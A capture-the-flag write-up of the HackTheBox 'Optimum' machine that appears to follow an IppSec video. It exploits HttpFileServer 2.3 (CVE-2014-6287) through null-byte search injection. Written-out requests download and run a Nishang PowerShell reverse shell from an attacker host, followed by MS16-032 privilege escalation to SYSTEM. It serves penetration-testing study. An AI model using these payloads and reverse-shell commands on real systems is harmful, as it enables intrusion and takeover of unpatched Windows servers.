Optimum Hackthebox

Disassembly of ippsec’s youtube video HackTheBox - Optimum. Windows box completed two different ways with and without Metasploit. Focusing on the usage of Powershell, enumerating the privesc with Sherlock and executing an exploit with a shell from Nishang and Empire.


Legal Usage: The information provided by [email protected] is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.


This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

nmap scan:

1
nmap -sC -sV -oA nmap 10.10.10.8

(results)

initially just looking at a web-server on port 80.

Worth testing the login feature with standard logins: admin/admin

Setting up a hydra on the back-end to brute force while continuing enumerating is not a bad idea.

Gained information: Application HttpFileServer 2.3D

Switching to an incognito window as the login is somehow adding a cookie thus making continued enumeration difficult. While incognito mode wouldn’t allow this.

google search HttpFileServer Exploit

Rapid7 CVE-2014-6287 Remote Code Execution exploit looking promising.

investigating CVE

The exploit works by taking advantage of the *findMacroMaker* function in *parserLib.pas* and allows for remote attackers to execute arbitrary programs via %00 null byte sequence in a search action.

HttpFileServer webapp

by sending a scripted function into the search we should be able to pass commands to the server.

there is a script that replaces the *{ } . |* on the application is where the vulnerability exists. By sending a %00 null byte we are telling the application end of string and terminates the regular expression and from that point afterward is injectable.

HFS scripting commands

Link: http://www.rejetto.com/wiki/index.php/HFS:_scripting_commands (page needs to be opened as cached)

Command of interest:

1
exec | A

1
example: {.exec|notepad.}

Inject exec with Burp

Turn Burp on and capture a request:

captured request and send to repeater (ctrl+r)

%00 null byte is captured in the GET “?search=” request.

Next we add /?search=%00{.exec|ping 10.10.14.17 and setup tcpdump to capture the ICMP request.

RCE

tcpdump setup:

1
1
tcpdump -i tun0

successfully captured an ICMP and at this point we have Remote Code Execution (RCE).

RCE to Reverse Shell (Nishang)

At this point since we have remote code execution via the exec we can now setup a reverse shell using Nishang.

Nishang Github Link: https://github.com/samratashok/nishang

1
cd Shells

use the *Invoke-PowerShellTcp.ps1*

copy *Invoke-PowerShellTcp.ps1* to working directory

1
cp Invoke-PowerShellTcp.ps1 ~/Documents/htb/boxes/optimum

Configure Invoke-PowerShellTcp.ps1

Checking out the powershell script:

The example shows the syntax we wnat to use:

1
Invoke-PowerShellTcp -Reverse -IPAddress [ipv6 address] -Port 4444

copy that go to the bottom of the script and paste and change to target:

setup listener

1
nc -lvnp 1337

SimpleHTTPServer setup

1
python -m SimpleHTTPServer

in directory of the .ps1 that we will upload to the sever

Windows 32bit / 64bit directories

1
2
3
4
5
6
C:\Windows\System32\ # 32bit
C:\Windows\SysWow64\ # still 32bit
C:\Windows\SysNative\ # 64bit ## Burp exec to download ps1 Inside Burp send the following command to have the target download our newly crafted ps1 file.


GET /?search=%00{.exec| c:\Windows\SysNative\WindowsPowershell\v.1.0\powershell.exe ping 10.10.14.17 #ctrl+u to unicode encode / ctrl+shift+u to decode

Listen on tcpdump

1
1
tcpdump -i tun0

confirmed connection

Sending ps1 payload:

1
GET /?search=%00{.exec| c:\Windows\SysNative\WindowsPowershell\v.1.0\powershell.exe IEX(New-ObjectNet.WebClient).downloadString('http://10.10.14.17:8000/Invoke-PowerShellTcp.ps1'),)

Url encode with ctrl+u:

Target executes the download:

executed x4 times but after execution on the 1337 listener we get a response:

Priv-Esc (windows)

First step:

1
systeminfo 

gets all the info on the box to include the hotfixes

2012 R2 Standard Boot times

use/edit Sherlock to enumerate KBs

copy Sherlock to directory

Sherlock Github Link: https://github.com/rasta-mouse/Sherlock

Grep for functions within sherlock:

1
grep -i function Sherlock.ps1

we are going to want to edit the script to “Find-AllVulns” and add line to bottom.

save.

Target InvokedShell Download Sherlock:

1
IEX(New-Object Net.Webclient).downloadString('http://10.10.14.17:8000/Sherlock.ps1')

(returns)

MS16-032 : Appears Vulnerable MS16-135 : Appears Vulnerable

if you were to search all the KBs on the target system you would see it was last patched in 2016.

google “Vulnerable” exploits

search for exploits:

first result happens to be metasploit.

search “MS16-032 powershell”

good proof of concept if we had an interactive shell with gui. Luckily, EMPIRE does have exploit.

1
/Empire/data/module_source/privesc

viewing “Invoke-MS16032.ps1”

example:

1
Invoke-MS16032 -Command "iex(New-Object.WebClient).DownloadString('http://google.com')"

There was a mistake with the example as it included a “-” where the filename doesn’t. Corrected in above example.

at very bottom of script copy/paste command:

get rid of “-”, change google to localip with “shell.ps1” and save.

Copy “Invoke-PowershellTcp.ps1” to “Shell.ps1”

1
cp Invoke-PowershellTcp.ps1 Shell.ps1

edit to port 1338

setup listener for port 1338

1
nc -lvnp 1338

Target nc session download Invoke-MS16032.ps1

1
IEX(New-Object.WebClient).DownloadString('http://10.10.14.17:8000/Invoke-MS16032.ps1')

download it our webserver:

(returns)

Root&Loot

on port “1338” the Shell.ps1 is loaded

NT Authority\System level access!

He continues onward to explain how to perform the same exploit with metasploit. Seeing as the OSCP exam only allow for one usage of metasploit we’ll leave this “Disassembled” at this point.


If you don’t know who IppSec is check him out at: Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA

Twitter: https://twitter.com/ippsec